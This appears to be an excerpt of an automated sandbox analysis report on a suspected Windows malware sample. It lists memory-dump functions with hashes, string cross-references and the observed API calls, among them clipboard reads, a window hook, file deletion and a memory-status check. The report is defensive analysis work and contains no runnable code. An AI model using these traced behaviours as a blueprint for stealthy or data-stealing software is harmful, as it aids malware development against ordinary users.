4'fq, xrefs: 04BE0E53
4'fq, xrefs: 04BE0E27
4'fq, xrefs: 04BE0F2F
4'fq, xrefs: 04BE0BED

Memory Dump Source

Source File: 0000000B.00000002.1758801927.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4be0000_kaJNzBnxbXm.jbxd

Similarity

API ID:
String ID: 4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq
API String ID: 0-3006135790
Opcode ID: 8eef7f009816a1cd2cfd20e1247cb30d9b49e9f00b19e88047f3438bef1cd002
Instruction ID: e6492e5cd21be10b8647e5bdfec07e7b30e3278519dc980d1e95990efba224d8
Opcode Fuzzy Hash: 8eef7f009816a1cd2cfd20e1247cb30d9b49e9f00b19e88047f3438bef1cd002
Instruction Fuzzy Hash: 81123A70E012098FCB4CEF75E995AAE77B6FF80300F6059A99109AB269DF312D54CF91

Uniqueness

Uniqueness Score: -1.00%

Function 04BE09E0 Relevance: 41.7, Strings: 33, Instructions: 434COMMON

Download Yara Rule

Strings

4'fq, xrefs: 04BE0F03
4'fq, xrefs: 04BE0B1B
4'fq, xrefs: 04BE0C9C
4'fq, xrefs: 04BE0DCF
4'fq, xrefs: 04BE0F87
4'fq, xrefs: 04BE0AD5
4'fq, xrefs: 04BE0C79
4'fq, xrefs: 04BE0BCA
4'fq, xrefs: 04BE0B61
4'fq, xrefs: 04BE0BA7
4'fq, xrefs: 04BE0DFB
4'fq, xrefs: 04BE0C56
4'fq, xrefs: 04BE0D4B
4'fq, xrefs: 04BE0ED7
4'fq, xrefs: 04BE0D77
4'fq, xrefs: 04BE0B3E
4'fq, xrefs: 04BE0E7F
4'fq, xrefs: 04BE0B84
4'fq, xrefs: 04BE0AF8
4'fq, xrefs: 04BE0C10
4'fq, xrefs: 04BE0CBF
4'fq, xrefs: 04BE0D28
4'fq, xrefs: 04BE0EAB
4'fq, xrefs: 04BE0F5B
4'fq, xrefs: 04BE0CE2
4'fq, xrefs: 04BE0DA3
4'fq, xrefs: 04BE0C33
4'fq, xrefs: 04BE0AB2
4'fq, xrefs: 04BE0D05
4'fq, xrefs: 04BE0E53
4'fq, xrefs: 04BE0E27
4'fq, xrefs: 04BE0F2F
4'fq, xrefs: 04BE0BED

Memory Dump Source

Source File: 0000000B.00000002.1758801927.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4be0000_kaJNzBnxbXm.jbxd

Similarity

API ID:
String ID: 4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq
API String ID: 0-3006135790
Opcode ID: c2c33e1b609cbb0fe5ebfd739ccef1ccf60d5ce0e2505ac6e2ee7975ab9daffd
Instruction ID: 08eca81e8b0e59be94e9bc75cc66340b2f3333e789b5917ae576e0bf9000c052
Opcode Fuzzy Hash: c2c33e1b609cbb0fe5ebfd739ccef1ccf60d5ce0e2505ac6e2ee7975ab9daffd
Instruction Fuzzy Hash: 5D123A70E012098FCB4CEF75E995AAE77B6FF80300F6059A99109AB269DF312D54CF91

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: kaJNzBnxbXm.exePID: 7788, Parent PID: 7496COMMON

Execution Graph

Execution Coverage:	11.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	195
Total number of Limit Nodes:	21

Executed Functions

Function 06BD34A0 Relevance: 8.0, Strings: 6, Instructions: 545
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$fq, xrefs: 06BD3B9F
$fq, xrefs: 06BD3BC8
$fq, xrefs: 06BD3BEC
$fq, xrefs: 06BD3BD4
$fq, xrefs: 06BD3BAB
$fq, xrefs: 06BD3BF8

Memory Dump Source

Source File: 0000000F.00000002.4196880616.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6bd0000_kaJNzBnxbXm.jbxd

Similarity

API ID:
String ID: $fq$$fq$$fq$$fq$$fq$$fq
API String ID: 0-1582559945
Opcode ID: 9f8c9b182f0f758132e65f6d1e955ba424a9dac7e791b17bec718280d7c116ba
Instruction ID: 99da10e8dbdcd258e5c012d9de7b1dda1c5689a9a44c374a454c9ecebaaed6af
Opcode Fuzzy Hash: 9f8c9b182f0f758132e65f6d1e955ba424a9dac7e791b17bec718280d7c116ba
Instruction Fuzzy Hash: 4A321C71E1071ACBCB14DF75C89069DB7B6FFC9300F1096AAD409AB265EB30AD85CB91

Uniqueness

Uniqueness Score: -1.00%

Function 06BD7DA0 Relevance: 3.0, Strings: 2, Instructions: 472COMMON

Download Yara Rule

Strings

$fq, xrefs: 06BD8318
$fq, xrefs: 06BD830C

Memory Dump Source

Source File: 0000000F.00000002.4196880616.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6bd0000_kaJNzBnxbXm.jbxd

Similarity

API ID:
String ID: $fq$$fq
API String ID: 0-2537786760
Opcode ID: 9228ce6cd3b11aa3f7e0df3a7262598ffd1ed26e8cc55142681a7172083868c0
Instruction ID: 131ad96aa20275113fbe84dda519ad5aeb31730ed84b77bac1fb0e597924ded7
Opcode Fuzzy Hash: 9228ce6cd3b11aa3f7e0df3a7262598ffd1ed26e8cc55142681a7172083868c0
Instruction Fuzzy Hash: D002B070B012058FCB54DF69D590AAEB7B6FF84351F1489A9D405AB394EB35EC82CB90

Uniqueness

Uniqueness Score: -1.00%

Function 06BD6618 Relevance: .8, Instructions: 817COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4196880616.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6bd0000_kaJNzBnxbXm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 672d6b443efd7ac44f863edcd2cc0b831cf8ebf44ec04828f01e01a29937230f
Instruction ID: ea05e6806bb7ceaa31f8934c7903e3abe402c0018d5e9a648963e9bbe17ad3a0
Opcode Fuzzy Hash: 672d6b443efd7ac44f863edcd2cc0b831cf8ebf44ec04828f01e01a29937230f
Instruction Fuzzy Hash: 0162AE74B002058FDB54DB68D590AADB7B2EF88354F1485A9E806EF395FB35EC81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 06BD55E0 Relevance: .6, Instructions: 590COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4196880616.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6bd0000_kaJNzBnxbXm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8c1c32fa8a9d0b34891a96b270290660894386eaccf4940d302ef0d2b75993b
Instruction ID: 12d997c9841eca4580149bf3ab98b8f0425dcfbc1cfb5ef7d80316cb7cc42da4
Opcode Fuzzy Hash: e8c1c32fa8a9d0b34891a96b270290660894386eaccf4940d302ef0d2b75993b
Instruction Fuzzy Hash: 3822A3B6E102158FDF70DFA4C5806AEBBB6EF84310F2484AAD445AF395EA35DC41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 06BDACF0 Relevance: 10.4, Strings: 8, Instructions: 389
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$fq, xrefs: 06BDAE11
$fq, xrefs: 06BDAEC8
$fq, xrefs: 06BDAE1D
$fq, xrefs: 06BDAE9F
$fq, xrefs: 06BDAEBC
$fq, xrefs: 06BDAE70
$fq, xrefs: 06BDAE64
$fq, xrefs: 06BDAE93

Memory Dump Source

Source File: 0000000F.00000002.4196880616.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6bd0000_kaJNzBnxbXm.jbxd

Similarity

API ID:
String ID: $fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq
API String ID: 0-3929485403
Opcode ID: 776dda6110bd5960ec7a15e59f3b03fe82da49a35800deea9fff5f26df2c3160
Instruction ID: ed47be9694fd0d7036ef7bf7c6ddc14c53d6ba282f4dc42978cabdc72f4c4fc5
Opcode Fuzzy Hash: 776dda6110bd5960ec7a15e59f3b03fe82da49a35800deea9fff5f26df2c3160
Instruction Fuzzy Hash: E0E15FB0E102098FDB65DF69D5906AEB7B2FF85300F209969E805EB354EB749C46CB81

Uniqueness

Uniqueness Score: -1.00%

Function 06BC7213 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 127
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

#4B, xrefs: 06BC7BCA
#4B, xrefs: 06BC9C92

Memory Dump Source

Source File: 0000000F.00000002.4196517191.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6bc0000_kaJNzBnxbXm.jbxd

Similarity

API ID:
String ID: #4B$#4B
API String ID: 0-1753244950
Opcode ID: f79bfe57da70c62b53d3c89d63274bdd4fabf795b6080b9ffd750397b57b8ceb
Instruction ID: d57e8a881c056c17e32f5c7dafd92b6ae2d490fa0bdac07e558a6f937bf25373
Opcode Fuzzy Hash: f79bfe57da70c62b53d3c89d63274bdd4fabf795b6080b9ffd750397b57b8ceb
Instruction Fuzzy Hash: 0741ACB28043898FDB10CF99D884BEFBFF4EB49320F14849AD459A7251C775AA04CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 06BC29EE Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06BC2B0A

Strings

#4B, xrefs: 06BC2A26
#4B, xrefs: 06BC2A46

Memory Dump Source

Source File: 0000000F.00000002.4196517191.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6bc0000_kaJNzBnxbXm.jbxd

Similarity

API ID: CreateWindow
String ID: #4B$#4B
API String ID: 716092398-1753244950
Opcode ID: d8bfcea11e657d76c471acdd1d17ea1a90d285157c360dc3843cb864027307c2
Instruction ID: 24539564690ee56212311d27caff03014f0fd546fb9de8b66dbba936524dd996
Opcode Fuzzy Hash: d8bfcea11e657d76c471acdd1d17ea1a90d285157c360dc3843cb864027307c2
Instruction Fuzzy Hash: A951B1B1D00349AFDB14CF99D984ADEFBB5FF48310F24916AE819AB210D7749945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 06BC29F8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06BC2B0A

Strings

#4B, xrefs: 06BC2A26
#4B, xrefs: 06BC2A46

Memory Dump Source

Source File: 0000000F.00000002.4196517191.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6bc0000_kaJNzBnxbXm.jbxd

Similarity

API ID: CreateWindow
String ID: #4B$#4B
API String ID: 716092398-1753244950
Opcode ID: a3a4d40db41ec59eb0cb110306c96c0cb6c08c91fe8b48ba42fdf58a700bd4aa
Instruction ID: 28e6a46b1d8256621703775a4c355a6cf8fe2297e08de4b8dbe68b9978d5106a
Opcode Fuzzy Hash: a3a4d40db41ec59eb0cb110306c96c0cb6c08c91fe8b48ba42fdf58a700bd4aa
Instruction Fuzzy Hash: BD41BEB1D003099FDB14CF9AD984ADEFBB5FF88310F24916AE819AB210D775A945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 06BC0900 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 06BC19B6

Strings

#4B, xrefs: 06BC19AB
#4B, xrefs: 06BC196F

Memory Dump Source

Source File: 0000000F.00000002.4196517191.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6bc0000_kaJNzBnxbXm.jbxd

Similarity

API ID: HandleModule
String ID: #4B$#4B
API String ID: 4139908857-1753244950
Opcode ID: dc2a4fd589d61f6ceb04089f7a893b97682be2915fcd8af7b78b41a36b7d9224
Instruction ID: b1a5e56a1001bd3efec85ca6300aeed35d0f77af6c27c90f49c214127ebc9427
Opcode Fuzzy Hash: dc2a4fd589d61f6ceb04089f7a893b97682be2915fcd8af7b78b41a36b7d9224
Instruction Fuzzy Hash: CE1102B6C002498FCB20DF9AD444B9EFBF4EB88224F14849ED559B7301C3B5A645CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 06BC194A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 06BC19B6

Strings

#4B, xrefs: 06BC19AB
#4B, xrefs: 06BC196F

Memory Dump Source

Source File: 0000000F.00000002.4196517191.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6bc0000_kaJNzBnxbXm.jbxd

Similarity

API ID: HandleModule
String ID: #4B$#4B
API String ID: 4139908857-1753244950
Opcode ID: 139c57d85b6429e215ec6f8816e66378073a603b996d84140f3e232b12428d44
Instruction ID: 11fab4a6391d9ee43b98e172a7d519648f3846ceff7817f29b73a13497cf9576
Opcode Fuzzy Hash: 139c57d85b6429e215ec6f8816e66378073a603b996d84140f3e232b12428d44
Instruction Fuzzy Hash: C11102B5C002498FCB20CF9AD844ADEFBF5EB88224F10845AD459B7301C3B5A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 06BD9170 Relevance: 5.2, Strings: 4, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$fq, xrefs: 06BD91B7
$fq, xrefs: 06BD91C3
$fq, xrefs: 06BD91FE
$fq, xrefs: 06BD91F2

Memory Dump Source

Source File: 0000000F.00000002.4196880616.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6bd0000_kaJNzBnxbXm.jbxd

Similarity

API ID:
String ID: $fq$$fq$$fq$$fq
API String ID: 0-2113499236
Opcode ID: b7f0c504b59e5b4534304a02d35b3ee1e2f13ebe85f15b20224714adfb91b220
Instruction ID: 61d32f1a201e1c1893368534926ceadb10ee4579713a99eed8c54185e7d8886d
Opcode Fuzzy Hash: b7f0c504b59e5b4534304a02d35b3ee1e2f13ebe85f15b20224714adfb91b220
Instruction Fuzzy Hash: F6918070F1021A8FDB54DF65D9907AEB7B6FF85200F1085A9C419EB398EF34AD818B91

Uniqueness

Uniqueness Score: -1.00%

Function 06BDCF70 Relevance: 4.6, Strings: 3, Instructions: 802
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$fq, xrefs: 06BDD367
$fq, xrefs: 06BDD37B
$fq, xrefs: 06BDD36F

Memory Dump Source

Source File: 0000000F.00000002.4196880616.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6bd0000_kaJNzBnxbXm.jbxd

Similarity

API ID:
String ID: $fq$$fq$$fq
API String ID: 0-837900676
Opcode ID: a4bda1439cadd78f5a25ce2a2feb27e03aa68cc1611a602e6d7bbf07b7986ad3
Instruction ID: aeceb1a82d6c9b2af8ed892add4e5465637f44026f6e44bf387ad7eff142253d
Opcode Fuzzy Hash: a4bda1439cadd78f5a25ce2a2feb27e03aa68cc1611a602e6d7bbf07b7986ad3
Instruction Fuzzy Hash: 1B6262B0A002068FCB55EF69D590A5DB7B2FF84700F109A79D045AF765EB79EC86CB80

Uniqueness

Uniqueness Score: -1.00%

Function 06BD4BA0 Relevance: 3.9, Strings: 3, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fkq, xrefs: 06BD4BCB
XPkq, xrefs: 06BD4CF1
\Okq, xrefs: 06BD4D7B

Memory Dump Source

Source File: 0000000F.00000002.4196880616.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6bd0000_kaJNzBnxbXm.jbxd

Similarity

API ID:
String ID: fkq$XPkq$\Okq
API String ID: 0-673657909
Opcode ID: 7c02801bdab992b17003af9768ff02c1fefad86ba2869655c57e300c5795a51f
Instruction ID: 88fa2a5995d45370fd3523c96410ae3c5776088151151712fefa18aef6b5bdff
Opcode Fuzzy Hash: 7c02801bdab992b17003af9768ff02c1fefad86ba2869655c57e300c5795a51f
Instruction Fuzzy Hash: A961AE70E002199FEB54DFA5C8547AEBBF6FF88300F20842AE105AB395EE749C45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 06BC6374 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 06BC7939

Strings

#4B, xrefs: 06BC788F

Memory Dump Source

Source File: 0000000F.00000002.4196517191.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6bc0000_kaJNzBnxbXm.jbxd

Similarity

API ID: CallProcWindow
String ID: #4B
API String ID: 2714655100-3992768631
Opcode ID: 7743e094671665e224e469e72a9d181e7149aecabf4d09de32e5f056a131ee1f
Instruction ID: 46c1dabb1abbeceb40ea9bd79e216c37b7ff70064210e9a930f326a5118f545d
Opcode Fuzzy Hash: 7743e094671665e224e469e72a9d181e7149aecabf4d09de32e5f056a131ee1f
Instruction Fuzzy Hash: 3E4128B5900309DFCB54CF99C888AAAFBF5FB88324F24C499D519A7321D775A941CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 06BC7570 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74
comclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleGetClipboard.OLE32(?), ref: 06BC8248

Strings

#4B, xrefs: 06BC81E2

Memory Dump Source

Source File: 0000000F.00000002.4196517191.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6bc0000_kaJNzBnxbXm.jbxd

Similarity

API ID: Clipboard
String ID: #4B
API String ID: 220874293-3992768631
Opcode ID: 68798bbea07108c28dc68a20debad026010781a32c7039a411807f96e1fd0330
Instruction ID: e2de48877364fc762c1f549bd57a1d68ff8da96dfcb165052fe6d23ee37c9d05
Opcode Fuzzy Hash: 68798bbea07108c28dc68a20debad026010781a32c7039a411807f96e1fd0330
Instruction Fuzzy Hash: E63101B0D01608DFDB64CF99C988B9EBBF5EF48314F248059E404BB290DBB56945CB91

Uniqueness

Uniqueness Score: -1.00%

Function 06BC81BF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 72
comclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleGetClipboard.OLE32(?), ref: 06BC8248

Strings

#4B, xrefs: 06BC81E2

Memory Dump Source

Source File: 0000000F.00000002.4196517191.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6bc0000_kaJNzBnxbXm.jbxd

Similarity

API ID: Clipboard
String ID: #4B
API String ID: 220874293-3992768631
Opcode ID: 8be612cec812823b4be487400138b1ac356d56ab5b8aef3898844ee1f13b3c9e
Instruction ID: e6b377a4aa556dee4a2c02eb9777b71211a39999341b30d332279034b3e74087
Opcode Fuzzy Hash: 8be612cec812823b4be487400138b1ac356d56ab5b8aef3898844ee1f13b3c9e
Instruction Fuzzy Hash: 29310FB0D01608DFDB64CF99D988BDEBBF5EF48314F208059E404BB290CBB46945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 06BC65E0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06BC666F

Strings

#4B, xrefs: 06BC6607

Memory Dump Source

Source File: 0000000F.00000002.4196517191.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6bc0000_kaJNzBnxbXm.jbxd

Similarity

API ID: DuplicateHandle
String ID: #4B
API String ID: 3793708945-3992768631
Opcode ID: eaff67b3ecb3853ba7212e1976f3e32bda4cc951f07aa6641c94d887e20c792d
Instruction ID: db879265312a4ff11881661258a7b4af29ff45da8f20a02a3dbfc40c70ab91d3
Opcode Fuzzy Hash: eaff67b3ecb3853ba7212e1976f3e32bda4cc951f07aa6641c94d887e20c792d
Instruction Fuzzy Hash: 1621E3B5D00248AFDB10CFAAD984ADEFFF8EB48320F14845AE954A3310D374A950CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06BC65E8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06BC666F

Strings

#4B, xrefs: 06BC6607

Memory Dump Source

Source File: 0000000F.00000002.4196517191.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6bc0000_kaJNzBnxbXm.jbxd

Similarity

API ID: DuplicateHandle
String ID: #4B
API String ID: 3793708945-3992768631
Opcode ID: 4a2ad03f8d3ae9204410e3d26bec540e2fdef03e0572e41cb54d515e3fe0fe5b
Instruction ID: addcc1b24c18d2a4b551d9116a5716aa2afab39bfb160349ae1c8171116a3d55
Opcode Fuzzy Hash: 4a2ad03f8d3ae9204410e3d26bec540e2fdef03e0572e41cb54d515e3fe0fe5b
Instruction Fuzzy Hash: E521E4B5D002489FDB10CFAAD984ADEFBF8EB48320F14805AE914A3310D374A940CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 02F08169 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(00000000), ref: 02F081E0

Strings

#4B, xrefs: 02F0818F

Memory Dump Source

Source File: 0000000F.00000002.4152989886.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2f00000_kaJNzBnxbXm.jbxd

Similarity

API ID: DeleteFile
String ID: #4B
API String ID: 4033686569-3992768631
Opcode ID: b6f4c6c1f39b6fe4941a5292841c9d553a2eadca3669a51a84bc46c9e98bf6ac
Instruction ID: 27b6878b0adb5ea5082f545d2b1434a619cbf56f24c069a05d89c4231a9ea04e
Opcode Fuzzy Hash: b6f4c6c1f39b6fe4941a5292841c9d553a2eadca3669a51a84bc46c9e98bf6ac
Instruction Fuzzy Hash: 282147B1C0061A9BCB10CF9AD941B9EFBB4FF48320F14816AD918B7240D378A900CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 06BC9F87 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(?,00000000,?,?), ref: 06BCA003

Strings

#4B, xrefs: 06BC9FA2

Memory Dump Source

Source File: 0000000F.00000002.4196517191.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6bc0000_kaJNzBnxbXm.jbxd

Similarity

API ID: HookWindows
String ID: #4B
API String ID: 2559412058-3992768631
Opcode ID: edd9b08cdb1644e46a80ccf692aae5642c0ddf8bd283778e504cf4b942eb4dec
Instruction ID: 00f072fcdaf34661bc02bbb89a2642f09c3ca595b683964dc1404ae6626b74e4
Opcode Fuzzy Hash: edd9b08cdb1644e46a80ccf692aae5642c0ddf8bd283778e504cf4b942eb4dec
Instruction Fuzzy Hash: 0C2127B5D002099FCB14CF9AD945BDEFBF5EB88320F10845AE419A7250C775A940CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 06BC9F88 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(?,00000000,?,?), ref: 06BCA003

Strings

#4B, xrefs: 06BC9FA2

Memory Dump Source

Source File: 0000000F.00000002.4196517191.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6bc0000_kaJNzBnxbXm.jbxd

Similarity

API ID: HookWindows
String ID: #4B
API String ID: 2559412058-3992768631
Opcode ID: 25ddd6975c0160c7913eb1cc9610e675a4cece3d6f8b0bb9124ec7fedf1928aa
Instruction ID: 862cf6ae2948bb986e6ed054c2c68452a7c650e63ac4e226df69d396b8e472b4
Opcode Fuzzy Hash: 25ddd6975c0160c7913eb1cc9610e675a4cece3d6f8b0bb9124ec7fedf1928aa
Instruction Fuzzy Hash: 222124B1D002099FCB14CF9AD944BEEFBF5EB88320F10846AE419A7250C775A940CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02F08170 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(00000000), ref: 02F081E0

Strings

#4B, xrefs: 02F0818F

Memory Dump Source

Source File: 0000000F.00000002.4152989886.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2f00000_kaJNzBnxbXm.jbxd

Similarity

API ID: DeleteFile
String ID: #4B
API String ID: 4033686569-3992768631
Opcode ID: 2540e4bce95dde683c4fcb55998802a7da8e3ff63d9b7476838c50775fbce605
Instruction ID: 6b1bfdde9f012319505667059bc885b025657161fe6938aaed16da2c26071b89
Opcode Fuzzy Hash: 2540e4bce95dde683c4fcb55998802a7da8e3ff63d9b7476838c50775fbce605
Instruction Fuzzy Hash: 491144B1C0065A9BDB10CF9AD945B9EFBF4FF48320F15816AD918B7240D778A940CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 02F0F0EA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNELBASE ref: 02F0F157

Strings

#4B, xrefs: 02F0F10F

Memory Dump Source

Source File: 0000000F.00000002.4152989886.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2f00000_kaJNzBnxbXm.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID: #4B
API String ID: 1890195054-3992768631
Opcode ID: e1236b9b11736d7d88645072b462b5b041666c26551bd46af5b8eaf01fc52074
Instruction ID: 660052c314b517304df7479b525e604df0420e4d4bcd26394432dc414e488d5a
Opcode Fuzzy Hash: e1236b9b11736d7d88645072b462b5b041666c26551bd46af5b8eaf01fc52074
Instruction Fuzzy Hash: 661100B1C0065A9FDB20CF9AD544BDEFBF4AB48320F25826AD518A7640D378A940CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02F0F0F0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNELBASE ref: 02F0F157

Strings

#4B, xrefs: 02F0F10F

Memory Dump Source

Source File: 0000000F.00000002.4152989886.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2f00000_kaJNzBnxbXm.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID: #4B
API String ID: 1890195054-3992768631
Opcode ID: 8548a1635b8c5d09c055f72975a50cb8f952fbb6c77a7722b021017739bf1111
Instruction ID: d63945b26ac99974782f6c451e6e16ec935d71eb50cb6d2b90cf126cb11fa704
Opcode Fuzzy Hash: 8548a1635b8c5d09c055f72975a50cb8f952fbb6c77a7722b021017739bf1111
Instruction Fuzzy Hash: 721123B1C0025ADBDB10CF9AD545BDEFBF4AF48320F15816AD918B7240D778A940CFA1

Uniqueness

